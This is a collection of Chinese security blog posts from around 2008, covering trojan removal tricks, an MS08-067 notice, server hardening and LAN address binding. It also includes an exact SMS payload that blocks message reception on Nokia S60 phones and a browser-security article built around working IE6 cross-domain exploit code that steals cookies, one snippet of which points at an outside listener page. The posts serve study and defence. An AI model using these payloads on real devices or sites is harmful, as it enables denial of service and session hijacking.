http://www.lovecns.com/index.php zh-cn http://www.lovecns.com/post/710/ GreyHawk <> Sun, 04 Jan 2009 10:27:54 +0000 http://www.lovecns.com/post/710/ 　　一、任务管理器给病毒背后一刀
　　Windows任务管理器是大家对进程进行管理的主要工具，在它的“进程”选项卡中能查看当前系统进程信息。在默认设置下，一般只能看到映像名称、用户名、CPU占用、内存使用等几项，而更多如I/O读写、虚拟内存大小等信息却被隐藏了起来。可别小看了这些被隐藏的信息，当系统出现莫名其妙的故障时，没准就能从它们中间找出突破口。
　　1.查杀会自动消失的双进程木马
　　前段时间朋友的电脑中了某木马，通过任务管理器查出该木马进程为“system.exe”，终止它后再刷新，它又会复活。进入安全模式把C:\windows\system32\system.exe删除，重启后它又会重新加载，怎么也无法彻底清除它。从此现象来看，朋友中的应该是双进程木马。这种木马有监护进程，会定时进行扫描，一旦发现被监护的进程遭到查杀就会复活它。而且现在很多双进程木马互为监视，互相复活。因此查杀的关键是找到这“互相依靠”的两个木马文件。借助任务管理器的PID标识可以找到木马进程。
　　调出Windows任务管理器，首先在“查看→选择列”中勾选“PID（进程标识符）”，这样返回任务管理器窗口后可以看到每一个进程的PID标识。这样当我们终止一个进程，它再生后通过PID标识就可以找到再生它的父进程。启动命令提示符窗口，执行“taskkill /im system.exe /f”命令。刷新一下电脑后重新输入上述命令，可以看到这次终止的system.exe进程的PID为1536，它属于PID为676的某个进程。也就是说PID为1536的system.exe进程是由PID为676的进程创建的。返回任务管理器，通过查询进程PID得知它就是“internet.exe”进程。
　　找到了元凶就好办了，现在重新启动系统进入安全模式，使用搜索功能找到木马文件c：\windows\internet.exe ，然后将它们删除即可。前面无法删除system.exe，主要是由于没有找到internet.exe（且没有删除其启动键值），导致重新进入系统后internet.exe复活木马。
　　2.揪出狂写硬盘的P2P程序

　　单位一电脑一开机上网就发现硬盘灯一直闪个不停，硬盘狂旋转。显然是本机有什么程序正在进行数据的读取，但是反复杀毒也没发现病毒、木马等恶意程序。
　　打开该电脑并上网，按Ctrl+Alt+Del键启动了任务管理器，切换到“进程”选项卡，点击菜单命令“查看→选择列”，同时勾选上“I/O写入”和“I/O写入字节”两项。确定后返回任务管理器，发现一个陌生的进程hidel.exe，虽然它占用的CPU和内存并不是特别大，但是I/O的写入量却大得惊人，看来就是它在捣鬼了，赶紧右击它并选择“结束进程”终止，果然硬盘读写恢复正常了。
　　二、系统备份工具杀毒于无形
　　笔者曾遭遇一个无法删除的病毒“C：\Program Files\Common Files\PCSuite\rasdf.exe”，同时也无法复制这个文件，如何清除它。笔者通过系统备份工具清除了该病毒，操作过程如下：
　　第一步：单击“开始→所有程序→附件→系统工具→备份”，打开备份或还原向导窗口，备份项目选择“让我选择要备份的内容”，定位到“C：\Program Files\Common Files\PCSuite”。
　　第二步：继续执行备份向导操作，将备份文件保存为“g：\virus.bkf”，备份选项勾选“使用卷阴影复制”，剩余操作按默认设置完成备份。
　　第三步：双击“g：\virus.bak”，打开备份或还原向导，把备份还原到“g：\virus”。接着打开“g：\virus”，使用记事本打开病毒文件“rasdf.exe”，然后随便删除其中几行代码并保存，这样病毒就被我们使用记事本破坏了（它再也无法运行）。
　　第四步：操作同上，重新制作“k：\virus”的备份为“k：\virus1.bkf”。然后启动还原向导，还原位置选择“C：\Program Files\Common Files\PCSuite\”，还原选项选择“替换现有文件”。这样，虽然当前病毒正在运行，但备份组件仍然可以使用坏的病毒文件替换当前病毒。还原完成后，系统提示重新启动，重启后病毒就不会启动了（因为它已被记事本破坏）。
　　三、记事本借刀杀人
　　1.双进程木马的查杀
　　现在，越来越多的木马采用双进程守护技术保护自己，就是两个拥有同样功能的代码程序，不断地检测对方是否已经被别人终止，如果发现对方已经被终止了，那么又开始创建对方，这给我们的查杀带来很大的困难。不过，此类木马也有“软肋”，它只通过进程列表进程名称来判断被守护进程是否存在。这样，我们只要用记事本程序来替代木马进程，就可以达到“欺骗”守护进程的目的。
　　下面以某变种木马的查杀为例。中招该木马后，木马的“internet.exe”和“systemtray.exe”两个进程会互相监视。当然，我们中招的时候大多不知道木马具体的监护进程。不过，通过进程名称可以知道，“systemtray.exe”是异常的进程，因为系统正常进程中没有该进程。下面使用替换方法来查杀该木马。
　　第一步：单击“开始→运行”，输入“Msinfo32”打开系统信息窗口，展开“系统摘要→软件环境→正在运行任务”，这里可以看到“systemtray.exe”路径在“C：\Windows\System32”下。
　　第二步：打开“C：\Windows\System32”，复制记事本程序“notepad.exe”到“D：\” ，同时重命名为“systemtray.exe”。
　　第三步：打开记事本程序，输入下列代码，保存为“shadu.bat”，放置在桌面（括号为注释，无须输入）：
　　@echo off
　　Taskkill /f /im systemtray.exe （使用taskkill命令强行终止“systemtray.exe”进程）
　　Delete C：\Windows\System32\systemtray.exe （删除病毒文件）
　　Copy D：\systemtray.exe C：\Windows\System32\（替换病毒文件）
　　第四步：现在只要在桌面运行“shadu.bat”，系统会将“systemtray.exe”进程终止并删除，同时把改名的记事本程序复制到系统目录。这样，守护进程会“误以为”被守护进程还存在，它会立刻启动一个记事本程序。
　　第五步：接下来我们只要找出监视进程并删除即可，在命令提示符输入：
　　“taskkill /f /im systemtray.exe ”，将守护进程再生的“systemtray.exe”终止，可以看到“systemtray.exe”进程是由“PID 3288的进程”创建的，打开任务管理器可以看到“PID 3288的进程”为“internet.exe”，这就是再生进程的“元凶”。
　　第六步：按照第一步方式，打开系统信息窗口可以看到“internet.exe”也位于系统目录，终止“internet.exe”进程并进入系统目录把上述两个文件删除即可。
　　2.使病毒失效并删除
　　大家知道，文件都是由编码组成的，记事本程序理论上可以打开任意文件（只不过有些会显示为乱码）。我们可以将病毒打开方式关联到记事本，使之启动后变成由记事本打开，失去作恶的功能。比如，一些顽固病毒常常会在注册表的“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run”等启动位置生成难以删除的键值，达到恶意启动的目的。下面使用记事本来“废”掉病毒的生命力。
　　第一步：启动命令提示符，输入“ftype exefile=notepad.exe %1”，把所有EXE程序打开方式关联到记事本程序，重启系统后我们会发现桌面自动启动好几个程序，这里包括系统正常的程序如输入法、音量调整程序等，当然也包括恶意启动的流氓程序，不过现在都被记事本打开了。
　　第二步：根据记事本窗口标题找到病毒程序，比如上例的systemtray.exe程序，找到这个记事本窗口后，单击“文件→另存为”，我们就可以看到病毒具体路径在“C：\Windows\System32”下。现在关掉记事本窗口，按上述路径提示进入系统目录删除病毒即可。
　　第三步：删除病毒后就可以删除病毒启动键值了，接着重启电脑，按住F8，然后在安全模式菜单选择“带命令提示的安全模式”，进入系统后会自动打开命令提示符。输入“ftype exefile="%1"%*”恢复exe文件打开方式即可。
　　四、注册表映像劫持让病毒没脾气
　　现在病毒都会采用IFO的技术，通俗的讲法是映像劫持，利用的是注册表中的如下键值
　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options位置来改变程序调用的，而病毒却利用此处将正常的杀毒软件给偷换成病毒程序。恰恰相反，让我们自己可以利用此处欺瞒病毒木马，让它实效。可谓，瞒天过海，还治其人。
　　下面我们以屏蔽某未知病毒KAVSVC.EXE为例，操作方法如下：
　　第一步：先建立以下一文本文件，输入以下内容，另存为1.reg
　　Windows Registry Editor Version 5.00
　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSVC.EXE]
　　"Debugger"="D：\1.exe"
　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSVC.EXE]
　　"Debugger"="D：\1.exe"
　　（注：第一行代码下有空行。）
　　第二步：双击导入该reg文件后，确定。
　　第三步：点“开始→运行”后，输入KAVSVC.EXE。
　　提示：1.exe可以是任意无用的文件，是我们随意创建一个文本文件后将后缀名.txt改为.exe的，
　　总结：当我们饱受病毒木马的折磨，在杀毒软件无能为力或者感觉“杀鸡焉用宰牛刀”时，不妨运用系统工具进行病毒木马的查杀，说不定会起到意想不到的效果。

Tags - 安全 , 杀毒 , 技巧 , 网管 ]]> http://www.lovecns.com/post/708/ GreyHawk <> Sat, 03 Jan 2009 10:39:46 +0000 http://www.lovecns.com/post/708/
这个攻击的实际工作原理是：当受害手机收到危害短信后，手机的短信处理模块会试图解析，但是因为模块设计中的缺陷，当遇到这条短信后，手机的短信处理模块会出错，但是这个模块仍然会不停的重试，从而最终导致短信处理模块陷于这个错误，无法继续接受后续其他的正常短信。

危害：
受害手机收到攻击短信后，收不到以后的所有短信，并且看不到攻击短信本身（攻击于无形，受害者压根不知情。由于查短信话单只能查发送的而查不到接收的，所以隐蔽性很高）.使用其他任意手机给中招手机发送短信，将无法送达（发送延缓） ，重新启动中招手机，问题依旧。

受影响的手机：  
采用 Symbain Series 60 的手机，覆盖了 诺基亚、三星、索尼等品牌

代表机型：
S60 3rd Edition, Feature Pack 1 (S60 3.1):
Nokia E90 Communicator
Nokia E71
Nokia E66
Nokia E51_（俺用地，汗）
Nokia N95 8GB
Nokia N95
Nokia N82
Nokia N81 8GB
Nokia N81
Nokia N76

Nokia 6290
Nokia 6124 classic
Nokia 6121 classic
Nokia 6120 classic
Nokia 6110 Navigator
Nokia 5700 XpressMusic

S60 3rd Edition, initial release (S60 3.0):
Nokia E70
Nokia E65
Nokia E62
Nokia E61i
Nokia E61
Nokia E60
Nokia E50
Nokia N93i
Nokia N93
Nokia N92
Nokia N91 8GB
Nokia N91  
Nokia N80
Nokia N77
Nokia N73
Nokia N71
Nokia 5500
Nokia 3250

S60 2nd Edition, Feature Pack 3 (S60 2.8):
Nokia N90
Nokia N72
Nokia N70

S60 2nd Edition, Feature Pack 2 (S60 2.6):
Nokia 6682
Nokia 6681
Nokia 6680
Nokia 6630

攻击方法（只供研究测试）：
以email格式（诺基亚手机发送短信时可选此选项，未提供该选项的可能需要自行更改相应标志位，值为0x32） 发送123456789@123456789.1234567890123  即可。

HappyNewYearANDHappySpringFestival@hello.hi 也行，只要满足xxx@yyy.zzz格式，不少于32个字符，并且以空格结尾就行。

注：对于S60 3.1版本，攻击短信需要发送11次才生效。

通过国外研究者的报告以及我们自己的验证，发现：
1.S60 2.8/3.1系统的诺基亚手机，在收到十余条该短信时会出现“内存不足，请先删除一些短信”类似提示，并且无法收到新短信。
2.其他上述提及系统的诺基亚手机，收到一条该短信后便无法收到新短信，且无任何提示。
鉴于该漏洞的严重危害性，提醒所有使用上述机型的机友：
1.S60 3.1系统的手机，进入短信息收件箱时，出现“内存不足，请删除一些短信”等提示时，很可能已经中招。
2.其他上述提及但非3.1系统的手机，长时间收不到短信息。


解决方案：
检测是否中招：自己给自己发送短信是否收到，或者发送hfcx给10086查余额。

中招的话按*#7370#格式化。格式化会丢失现有内存信息，包括电话本和短信等，记得先备份。

提供个漏洞扫描与专杀工具，安装后请重新启动手机杀毒。
点击这里下载文件


Tags - 手机 , 安全 ]]> http://www.lovecns.com/post/695/ GreyHawk <> Fri, 24 Oct 2008 06:25:26 +0000 http://www.lovecns.com/post/695/         相信很多没有关闭自动更新Windows用户在今天早些时候已经收到了系统更新通知，您是否会误以为微软的正版验证找到了您?很幸运这个补丁并不会给您的系统造成黑屏，然而更严重的威胁却已经逼近。今天早些时候的微软补丁，是两年来微软第二次打破常规的补丁发布，按照微软的命名习惯，此安全补丁编号“KB958644”( MS08-067 )。据微软官方解释“这是Windows操作系统下的Server服务在处理RPC请求过程中存在的一个严重漏洞，远程攻击者可以通过发送恶意RPC请求触发这个溢出，导致完全入侵用户系统，并以SYSTEM权限执行任意指令并获取数据，造成系统失窃及系统崩溃等严重问题。

　　在微软施行每月一次安全升级制度以来，这还是第二次打破惯例。上次让微软破例进行安全升级的不定位，是2007年4月的ANI动态光标漏洞，可想而言此次微软补丁升级将会给用户打来严重的威胁。

　　MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统，包括：Windows 2000/XP/Server、2003/Vista/Server 2008的各个版本，甚至还包括测试阶段的Windows 7 Pre-Beta。可以说，黑客的反应速度是非常快的，在国外某安全站点放出了该漏洞的利用代码(Exploits)，然后进行编译就可以对没打该补丁的机器进行控制。

漏洞补丁下载地址：

Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 1
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 SP1（用于基于 Itanium 的系统）
Windows Server 2003 SP2（用于基于 Itanium 的系统）
Windows Vista 和 Windows Vista Service Pack 1
Windows Vista x64 Edition 和 Windows Vista x64 Edition Service Pack 1
Windows Server 2008（用于 32 位系统）
Windows Server 2008（用于基于 x64 的系统）
Windows Server 2008（用于基于 Itanium 的系统）
Windows 7 Beta（用于 32 位系统）
Windows 7 Beta x64 Edition
Windows 7 Beta（用于基于 Itanium 的系统）
详细信息：Microsoft 安全公告 MS08-067 - 严重： 服务器服务中的漏洞可能允许远程执行代码 (958644)
Tags - 安全 , 网管 , 资源 ]]> http://www.lovecns.com/post/658/ GreyHawk <> Wed, 18 Jun 2008 12:51:35 +0000 http://www.lovecns.com/post/658/
Issue 0x02, Phile #0x04 of 0x0A


|=---------------------------------------------------------------------------=|
|=-----------------------=[ 浅析浏览器的跨域安全问题 ]=----------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=-----------------------=[ By rayh4c ]=----------------------=|
|=----------------------=[ <rayh4c_at_80sec.com> ]=---------------------=|
|=---------------------------------------------------------------------------=|

Manuel Caballero大牛在这次的BLUEHAT大会上讲了一个叫A Resident in My Domain
的议题，字面上的意思就是驻留在自己的域，随后开始有牛人在自己BLOG上写了一些相关的
内容，这段时间一直和HI群里的朋友在讨论这个问题，大家都简称为鬼页，这个鬼页非常神奇，
可以跟随你浏览的每个页面。经过鬼页的启发，我也对浏览器的跨域安全问题进行了测试。

1.来自伪协议的呼唤

JAVASCRIPT里大家都频繁使用window对象，window对象代表的就是浏览器的窗口，我们
就来测试下window对象的open方法，尝试让新开的窗口执行伪协议。

在本机搭建一个WEB服务器，开始做下实验：

用各个浏览器浏览 http://127.0.0.1/test.htm ，下面是test.htm的脚本内容：

<script>
x=window.open("about:blank");
x.location="javascript:alert(document.domain)"
</script>

结果是：

IE6：执行了伪协议，认为弹出窗口的域是127.0.0.1。
IE7：执行了伪协议，认为弹出窗口的域是127.0.0.1。
Firefox：执行了伪协议,认为还没有域为NULL。

Firefox这里对于这个接口可能也有个BUG，对于IP地址的弹窗Firefox没有辨认出域，但
是在实际绑定域名的情况下还是辨认出了域。

为了下面的部分方便理解，我把这里弹窗的关系给简称下，原来的窗口叫父页，弹出窗口
叫子页，实验过后我们证明了:

父页和子页都在同一个域里，父页可以重定向子页的URL地址，甚至执行伪协议。

2.父页和子页的关系

如果父页让子页访问其他域后，父页和子页是否就脱离关系了呢？

继续测试，用各个浏览器浏览 http://127.0.0.1/test2.htm ，下面是test2.htm的脚本
内容：

<script>
x=window.open("about:blank");
x.location="http://www.163.com" //访问163网站
setTimeout(function(){
x.location="http://127.0.0.1";
},5000) //5秒后重定向到127.0.0.1
</script>

这次IE6、IE7、Firefox都达成了一致，实验的结果是子页访问了163网站，5秒然后又跳
回了127.0.0.1。

所以就算是子页在访问了其他域后，还是会受父页的控制。

3.域与域之间的牵绊

如果父页让子页访问某个域后，再执行伪协议会有什么效果？

用各个浏览器浏览 http://127.0.0.1/test3.htm，下面是test3.htm的脚本内容：

<script>
x=window.open("about:blank");
x.location="http://www.163.com"
setTimeout(function(){
x.location="javascript:alert(document.cookie)";
},5000)
</script>

结果是：

IE6：没有反应。
IE7：报错，拒绝访问。
Firefox：报错，alert没有定义。

这些信息明显的说明，如果子页和父页不在同一个域里，浏览器是不允许父页控制子页
执行伪协议脚本的。

为了进一步验证，我们让子页打开同一个域里的页面测试：

用各个浏览器浏览 http://127.0.0.1/test4.htm，下面是test4.htm的脚本内容：

<script>
document.cookie="xss:true" //给本域设置一个COOKIE为xss:true
x=window.open("about:blank");
x.location="http://127.0.0.1"
setTimeout(function(){
x.location="javascript:alert(document.cookie)";
},5000)
</script>

结果IE6、IE7、Firefox都顺利的弹出了COOKIE值，说明如果子页和父页在同一个域里，
浏览器是允许父页控制子页执行伪协议脚本的。

4.安全上的差异

父页和子页这种微妙的关系，到这里就开始引发安全问题了，PDP等大牛在分析鬼页的时
候给出了EXP:

javascript:x=open("http://hackademix.net/");setInterval(function(){try{x.frames[0].location={toString:function(){return "http://www.sirdarckcat.net/caballero-listener.html";}}}catch(e){}},5000);void(1);

EXP按上面三部分的概念解释是：

父页是A域，父页指定子页访问B域内一个带框架的页面，父页就能够控制B域页面内框架
的URL地址，这个就是典型的跨域操作了。

鬼页能够跨域操作框架的关键是window.frames[0]方法没有受到域的限制，第二个是让
location指定的地址看起来像个对象而不是参数。

我们按照鬼页的思路，继续在第3部分的基础上测试下去,将location指定的地址使用
new String()对象处理。

用各个浏览器浏览 http://127.0.0.1/test5.htm，下面是test5.htm的脚本内容：

<script>
x=window.open("about:blank");
x.location="http://www.163.com"；
setTimeout(function(){
x.location=new String("javascript:alert(document.cookie)")
},5000)
</script>

IE6：弹出COOKIE。
IE7：报错，拒绝访问。
Firefox：报错，alert没有定义。

结果是IE6奇迹般的弹出了COOKIE，我们做到了跨域执行脚本。

5.灾难性的后果

到这里我们发现了一个IE6的0DAY，一定程度上这个跨域安全问题是灾难性的，如下面的
EXP：

<a href="">IE6 Cross Domain Scripting</a>
<script>
function win(){
x=window.open("http://www.phpwind.net");
setTimeout(function(){
x.location=new String("javascript:alert(document.cookie)")
},3000)
}
window.onload=function(){
for (i=0;i<document.links.length;i++) {
document.links[i].href="javascript:win()"
}
}
</script>

点击链接后，马上得到了PHPWIND论坛的COOKIE，这就意味着黑客通过类似的攻击可以得
到你访问过的任意网站的COOKIE，然后劫持你的会话。

这样的漏洞相当于一个没有域限制的XSS漏洞，几乎是无法防御的，网站只能进一步的加
强客户端的会话安全，如使用SSL加密连接、设置安全COOKIE加上HTTPONLY参数、给敏感的
请求操作加上水印等。

6.总结

这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏，没有考虑清楚不
同域有继承关系的window对象操作后的变化，只是对window对象的一些方法的参数做了类似
数据类型的限制，导致最后绕过限制跨域执行了脚本。

从这个漏洞我们也可以看出IE7的一些新的安全特性，通过继承关系的window对象操作
来跨域执行脚本伪协议最后是判断了域的，IE7已经开始防范类似的攻击。

但是这里并没有在本质上解决跨域安全问题，IE7只防范了跨域执行脚本，对于其他跨域
的操作仍然是放行的，所以鬼页在IE7下可以跨域操作框架URL，而Firefox却没有存在相同的
问题，说明不同浏览器在安全的考虑上也是存在很多差异的。

针对IE我又测试了其他对象方法，发现很多都被限制住了，但不排除还有同样的问题存
在。按照类似的思路，大家可以继续尝试挖掘浏览器的一些跨域漏洞。

最后感谢HI群里共同讨论的朋友。

7.参考

[1] Browser"s Ghost Busters: http://sirdarckcat.blogspot.com/2008/05/browsers-ghost-busters.html
[2] Ghost Busters: http://www.gnucitizen.org/blog/ghost-busters/

-EOF-

Tags - 原理 , 安全 , 代码 ]]> http://www.lovecns.com/post/657/ GreyHawk <> Sun, 15 Jun 2008 07:47:00 +0000 http://www.lovecns.com/post/657/
　　这里就我个人过去的经历和大家一同来探讨有关安全虚拟主机配置的问题。以下以建立一个站点cert.ecjtu.jx.cn为例，跟大家共同探讨虚拟主机配置问题。

　　一、建立Windows用户

　　为每个网站单独设置windows用户帐号cert，删除帐号的User组，将cert加入Guest用户组。将用户不能更改密码，密码永不过期两个选项选上。

　　二、设置文件夹权限

　　1、设置非站点相关目录权限

　　Windows安装好后，很多目录和文件默认是everyone可以浏览、查看、运行甚至是可以修改 的。这给服务器安全带来极大的隐患。这里就我个人的一些经验提一些在入侵中较常用的目录。

　　C：\；D：\；……
　　C:\perl
　　C:\temp\
　　C:\Mysql\
　　c:\php\
　　C:\autorun.inf
　　C:\Documents and setting\
　　C:\Documents and Settings\All Users\「开始」菜单\程序\
　　C:\Documents and Settings\All Users\「开始」菜单\程序\启动
　　C:\Documents and Settings\All Users\Documents\
　　C:\Documents and Settings\All Users\Application Data\Symantec\
　　C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere
　　C:\WINNT\system32\config\
　　C:\winnt\system32\inetsrv\data\
　　C:\WINDOWS\system32\inetsrv\data\
　　C:\Program Files\
　　C:\Program Files\Serv-U\
　　c:\Program Files\KV2004\
　　c:\Program Files\Rising\RAV
　　C:\Program Files\RealServer\
　　C:\Program Files\Microsoft SQL server\
　　C:\Program Files\Java Web Start\　　

　　
　　以上这些目录或文件的权限应该作适当的限制。如取消Guests用户的查看、修改和执行等权限。由于篇幅关系，这里仅简单提及。

　　2、设置站点相关目录权限：

　　A、设置站点根目录权限：将刚刚建立的用户cert给对应站点文件夹，假设为D：\cert设置相应的权限：Adiministrators组为完全控制；cert有读取及运行、列出文件夹目录、读取，取消其它所有权限。

　　B、设置可更新文件权限：经过第1步站点根目录文件夹权限的设置后，Guest用户已经没有修改站点文件夹中任何内容的权限了。这显然对于一个有更新的站点是不够的。这时就需要对单独的需更新的文件进行权限设置。当然这个可能对虚拟主机提供商来说有些不方便。客户的站点的需更新的文件内容之类的可能都不一样。这时，可以规定某个文件夹可写、可改。如有些虚拟主机提供商就规定，站点根目录中uploads为web可上传文件夹，data或者database为数据库文件夹。这样虚拟主机服务商就可以为客户定制这两个文件夹的权限。当然也可以像有些做的比较好的虚拟主机提供商一样，给客户做一个程序，让客户自己设定。可能要做到这样，服务商又得花不小的钱财和人力哦。

三、配置IIS 　　

　　基本的配置应该大家都会，这里就提几个特殊之处或需要注意的地方。

　　1、主目录权限设置：这里可以设置读取就行了。写入、目录浏览等都可以不要，最关键的就是目录浏览了。除非特殊情况，否则应该关闭，不然将会暴露很多重要的信息。这将为黑客入侵带来方便。其余保留默认就可以了。

　　2、应用程序配置：在站点属性中，主目录这一项中还有一个配置选项，点击进入。在应用程序映射选项中可以看到，默认有许多应用程序映射。将需要的保留，不需要的全部都删除。在入侵过程中，很多程序可能限制了asp，php等文件上传，但并不对cer，asa等文件进行限制，如果未将对应的应用程序映射删除，则可以将asp的后缀名改为cer或者asa后进行上传，木马将可以正常被解析。这也往往被管理员忽视。另外添加一个应用程序扩展名映射，可执行文件可以任意选择，后缀名为.mdb。这是为了防止后缀名为mdb的用户数据库被下载。

　　3、目录安全性设置：在站点属性中选择目录安全性，点击匿名访问和验证控制，选择允许匿名访问，点击编辑。如下图所示。删除默认用户，浏览选择对应于前面为cert网站设定的用户，并输入密码。可以选中允许IIS控制密码。这样设定的目的是为了防止一些像站长助手、海洋等木马的跨目录跨站点浏览，可以有效阻止这类的跨目录跨站入侵。

　　4、可写目录执行权限设置：关闭所有可写目录的执行权限。由于程序方面的漏洞，目前非常流行上传一些网页木马，绝大部分都是用web进行上传的。由于不可写的目录木马不能进行上传，如果关闭了可写目录的执行权限，那么上传的木马将不能正常运行。可以有效防止这类形式web入侵。

　　5、处理运行错误：这里有两种方法，一是关闭错误回显。IIS属性――主目录――配置――应用程序调试――脚本错误消息，选择发送文本错误信息给客户。二是定制错误页面。在IIS属性――自定义错误信息，在http错误信息中双击需要定制的错误页面，将弹出错误映射属性设置框。消息类型有默认值、URL和文件三种，可以根据情况自行定制。这样一方面可以隐藏一些错误信息，另外一方面也可以使错误显示更加友好。

　　四、配置FTP

　　Ftp是绝大部分虚拟主机提供商必备的一项服务。用户的站内文件大部分都是使用ftp进行上传的。目前使用的最多的ftp服务器非Serv-U莫属了。这里有几点需要说明一下。
　　
　　1、管理员密码必须更改

　　如果入侵爱好者们肯定对Serv-U提权再熟悉莫过了。这些提权工具使用的就是Serv-U默认的管理员的帐号和密码运行的。因为Serv-U管理员是以超级管理员的身份运行的。如果没有更改管理员密码，这些工具使用起来就再好用不过了。如果更改了密码，那这些工具要想正常运行，那就没那么简单喽。得先破解管理员密码才行。

　　2、更改安装目录权限

　　Serv-U的默认安装目录都是everyone可以浏览甚至可以修改的。安装的时候如果选择将用户信息存储在ini文件中，则可以在ServUDaemon.ini得到用户的所有信息。如果Guests有修改权限，那么黑客就可以顺利建立具有超级权限的用户。这可不是一件好事。所以在安装好Serv-U之后，得修改相应的文件夹权限，可以取消Guests用户的相应权限。

五、命令行相关操作处理

　　1、禁止guests用户执行com.exe：

　　我们可以通过以下命令取消guests执行com.exe的权限
  cacls C:\WINNT\system3\Cmd.exe /e /d guests。

　　2、禁用Wscript.Shell组件：

　　Wscript.Shell可以调用系统内核运行DOS基本命令。可以通过修改注册表，将此组件改名，来防止此类木马的危害。HKEY_CLASSES_ROOT\Wscript.Shell\ 及HKEY_CLASSES_ROOT\Wscript.Shell.1\改名为其它的名字。将两项clsid的值也改一下HKEY_CLASSES_ROOT\Wscript.Shell\CLSID\项目的值和HKEY_CLASSES_ROOT\Wscript.Shell.1\CLSID\项目的值，也可以将其删除。

　　3、禁用Shell.Application组件

　　Shell.Application也可以调用系统内核运行DOS基本命令。可以通过修改注册表，将此组件改名，来防止此类木马的危害。HKEY_CLASSES_ROOT\Shell.Application\ 及HKEY_CLASSES_ROOT\Shell.Application.1\ 改名为其它的名字。将HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值更改或删除。同时，禁止Guest用户使用shell32.dll来防止调用此组件。使用命令：cacls C:\WINNT\system32\shell32.dll /e /d guests

　　4、FileSystemObject组件

　　FileSystemObject可以对文件进行常规操作可以通过修改注册表，将此组件改名，来防止此类木马的危害。对应注册表项为HKEY_CLASSES_ROOT\scripting.FileSystemObject\。可以禁止guests用户使用或直接将其删除。考虑到很多的上传都会使用到这个组件，为了方便，这里不建议更改或删除。

　　5、禁止telnet登陆
　　
　　在C:\WINNT\system32目录下有个login.cmd文件，将其用记事本打开，在文件末尾另取一行，加入exit保存。这样用户在登陆telnet时，便会立即自动退出。

　　注：以上修改注册表操作均需要重新启动WEB服务后才会生效。

　　六、端口设置
　　
　　端口窗体底端就是门，这个比喻非常形象。如果我们服务器的所有端口都开放的话，那就意味着黑客有好多门可以进行入侵。所以我个人觉得，关闭未使用的端口是一件重要的事情。在控制面板――网络与拨号连接――本地连接――属性――Internet协议（TCP/IP）属性，点击高级，进入高级TCP/IP设置，选择选项，在可选的设置中选择TCP/IP筛选，启用TCP/IP筛选。添加需要的端口，如21、80等，关闭其余的所有未使用的端口。

　　七、关闭文件共享

　　系统默认是启用了文件共享功能的。我们应给予取消。在控制面板――网络和拨号连接――本地连接――属性，在常规选项种，取消Microsoft 网络文件和打印共享。服务最少原则是保障安全的一项重要原则。非必要的服务应该给予关闭。系统服务可以在控制面板――管理工具――服务中进行设定。

　　八、关闭非必要服务

　　类似telnet服务、远程注册表操作等服务应给予禁用。同时尽可能安装最少的软件。这可以避免一些由软件漏洞带来的安全问题。有些网管在服务器上安装QQ，利用服务器挂QQ，这种做法是极度错误的。

　　九、关注安全动态及时更新漏洞补丁

　　更新漏洞补丁对于一个网络管理员来说是非常重要的。更新补丁，可以进一步保证系统的安全。
Tags - 安全 , 技巧 , 网管 ]]> http://www.lovecns.com/post/655/ GreyHawk <> Sun, 15 Jun 2008 07:44:30 +0000 http://www.lovecns.com/post/655/
我们单位所在局域网有100多台计算机，为了区分不同用户分配更详细的访问权限，我们采用的是设置固定IP的方法，而不是自动获取IP地址，再就是我们还要有一部分要连到互联网上。这样就要设两个子网如内网我们设为192.168.0.1网段，能连外网的我们设为192.168.1.1网段。在实际使用中遇到了经常有用户为了上网私自修改IP地址，从而造成网络冲突的问题。表现如下：

因为我们的计算机都是使用Windows XP系统的可以设两个以上的IP所以用户可以私自设置上两个网段的IP地址这样第一可以联入单位的局域网也可以连到因特网，这是公司不允许的。公司经理要求马上解决这个问题，要不然这个月的奖金就没了。

下面是我解决的过程和自己的一些心得，希望能给要解决这样问题的一些提示。

方法一，IP与MAC地址的绑定加上路由器的MAC过滤功能(我用的是TP-LINK路由器)

使用ARP -s 192.168.1.2 00-AO-43-E0-6A-84的命令，这样就将静态IP地址192.168.1.2与网卡地址为00-AO-43-E0-6A-84的计算机绑定在一起了，使别人就不能使用这个IP地址了。再进入路由器的MAC过滤功能选中只允许下列MAC的网卡地址连入外网把00-AO-43-E0-6A-84填入即可。

可是上面提到的方法虽然可以在一定程度上解决非法用户网络接入的问题和网络冲突的问题，但用户还是可以通过修改注册表，下载专用修改MAC小工具等方法，轻松更改了本机的MAC地址，甚至将本机的MAC地址和IP地址改得和上面能上网的机器一模一样。非法用户又可以非法使用网络了。并且我用的路由器MAC过滤功能只能填入16个MAC(我不是说TP-LINK的东东不好，只是我们用的那个价格太低了)。

方法二，交换机的MAC地址与端口绑定

我可以将交换机的MAC地址与端口绑定后，非法用户擅自改动本机网卡的MAC地址，该机器的网络访问将因其MAC地址被交换机认定为非法而无法实现。这样他们想改也不敢了。

登录进入交换机(我单位用的是CISCO交换机，我想别的品牌的交换机也差不多)，输入管理口令进入配置模式:

敲入命令：(config)#mac_address_table permanent [MAC地址] [以太网端口号]

这样逐一地将每个端口与相应的计算机MAC地址进行绑定，保存退出后就彻底阻止了用户的非法修改。

方法三，防火墙与代理服务器

